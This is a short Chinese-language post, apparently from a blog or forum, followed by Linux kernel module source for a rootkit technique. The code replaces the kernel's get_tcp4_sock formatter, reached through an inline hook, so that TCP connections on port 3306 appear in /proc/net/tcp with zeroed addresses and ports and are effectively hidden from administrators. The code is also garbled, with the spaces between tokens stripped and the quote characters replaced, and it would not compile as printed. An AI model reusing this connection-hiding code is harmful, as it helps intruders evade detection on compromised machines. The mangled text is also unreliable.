直接inlinehook住get_tcp4_sock这个函数就行了,只不过需求重新实现下get_tcp4_sock的功效,在作下过滤.对比简单,代码以下:
#include<linux/kernel.h>
#include<linux/init.h>
#include<linux/module.h>
#include<linux/version.h>
#include<linux/types.h>
#include<linux/string.h>
#include<linux/unistd.h>
#include<linux/fs.h>
#include<linux/kmod.h>
#include<linux/file.h>
#include<linux/sched.h>
#include<linux/mm.h>
#include<linux/slab.h>
#include<linux/spinlock.h>
#include<linux/socket.h>
#include<linux/net.h>
#include<linux/in.h>
#include<linux/skbuff.h>
#include<linux/ip.h>
#include<linux/tcp.h>
#include<net/sock.h>
#include<asm/uaccess.h>
#include<asm/unistd.h>
#include<asm/termbits.h>
#include<asm/ioctls.h>
#include<linux/icmp.h>
#include<linux/netdevice.h>
#include<linux/netfilter.h>
#include<linux/netfilter_ipv4.h>
MODULE_LICENSE(“GPL”);
MODULE_AUTHOR(“wzt”);
__u32wnps_in_aton(constchar*str)
{
unsignedlongl;
unsignedintval;
inti;
l=0;
for(i=0;i<4;i++){
l<<=8;
if(*str!=’\0′){
val=0;
while(*str!=’\0’&&*str!=’.’){
val*=10;
val+=*str-‘0′;
str++;
}
l|=val;
if(*str!=’\0’)
str++;
}
}
return(htonl(l));
}
voidnew_get_tcp4_sock(structsock*sk,structseq_file*f,inti,int*len)
{
inttimer_active;
unsignedlongtimer_expires;
structtcp_sock*tp=tcp_sk(sk);
conststructinet_connection_sock*icsk=inet_csk(sk);
structinet_sock*inet=inet_sk(sk);
__be32dest=inet->daddr;
__be32src=inet->rcv_saddr;
__u16destp=ntohs(inet->dport);
__u16srcp=ntohs(inet->sport);
printk(“!!innew_get_tcp4_sock.\n”);
if(icsk->icsk_pending==ICSK_TIME_RETRANS){
timer_active=1;
timer_expires=icsk->icsk_timeout;
}elseif(icsk->icsk_pending==ICSK_TIME_PROBE0){
timer_active=4;
timer_expires=icsk->icsk_timeout;
}elseif(timer_pending(&sk->sk_timer)){
timer_active=2;
timer_expires=sk->sk_timer.expires;
}else{
timer_active=0;
timer_expires=jiffies;
}
/*
if(src==wnps_in_aton(“127.0.0.1”)){
printk(“got127.0.0.1”);
return;
}
*/
if(srcp==3306||destp==3306){
printk(“got3306!\n”);
seq_printf(f,”%4d:%08X:%04X%08X:%04X%02X%08X:%08X%02X:%08lX”
“%08X%5d%8d%lu%d%p%lu%lu%u%u%d%n”,
0,0,0,0,0,0,
tp->write_seq-tp->snd_una,
sk->sk_state==TCP_LISTEN?sk->sk_ack_backlog:
(tp->rcv_nxt-tp->copied_seq),
timer_active,
jiffies_to_clock_t(timer_expires-jiffies),
icsk->icsk_retransmits,
sock_i_uid(sk),
icsk->icsk_probes_out,
sock_i_ino(sk),
atomic_read(&sk->sk_refcnt),sk,
jiffies_to_clock_t(icsk->icsk_rto),
jiffies_to_clock_t(icsk->icsk_ack.ato),
(icsk->icsk_ack.quick<<1)|icsk->icsk_ack.pingpong,
tp->snd_cwnd,
tp->snd_ssthresh>=0xFFFF?-1:tp->snd_ssthresh,
len);
}
else{
seq_printf(f,”%4d:%08X:%04X%08X:%04X%02X%08X:%08X%02X:%08lX”
“%08X%5d%8d%lu%d%p%lu%lu%u%u%d%n”,
i,src,srcp,dest,destp,sk->sk_state,
tp->write_seq-tp->snd_una,
sk->sk_state==TCP_LISTEN?sk->sk_ack_backlog:
(tp->rcv_nxt-tp->copied_seq),
timer_active,
jiffies_to_clock_t(timer_expires-jiffies),
icsk->icsk_retransmits,
sock_i_uid(sk),
icsk->icsk_probes_out,
sock_i_ino(sk),
atomic_read(&sk->sk_refcnt),sk,
jiffies_to_clock_t(icsk->icsk_rto),
jiffies_to_clock_t(icsk->icsk_ack.ato),
(icsk->icsk_ack.quick<<1)|icsk->icsk_ack.pingpong,
tp->snd_cwnd,
tp->snd_ssthresh>=0xFFFF?-1:tp->snd_ssthresh,
len);
}
}
